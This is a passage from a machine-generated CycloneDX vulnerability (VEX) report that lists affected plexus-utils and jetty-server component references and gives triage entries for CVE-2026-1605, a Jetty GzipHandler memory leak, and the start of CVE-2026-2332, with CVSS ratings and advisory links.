          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-1605",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        401
      ],
      "description": "In Eclipse Jetty, versions 12.0.0-12.0.31 and 12.1.0-12.0.5, class GzipHandler exposes a vulnerability when a compressed HTTP request, with Content-Encoding: gzip, is processed and the corresponding response is not compressed.\n\n\nThis happens because the JDK Inflater is allocated for decompressing the request, but it is not released because the release mechanism is tied to the compressed response.\nIn this case, since the response is not compressed, the release mechanism does not trigger, causing the leak.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-server to version 12.1.6, 12.0.32",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1605"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1605"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/issues/14260"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-xxh7-fcf3-rj7f"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/79"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1605"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1605"
        }
      ],
      "published": "2026-03-05T10:15:56+00:00",
      "updated": "2026-03-06T20:16:49+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25",
          "versions": [
            {
              "version": "12.0.25",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "The gzip handler is used uniformly, and the prerequisites for exploitation are not met."
      }
    },
    {
      "id": "CVE-2026-2332",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
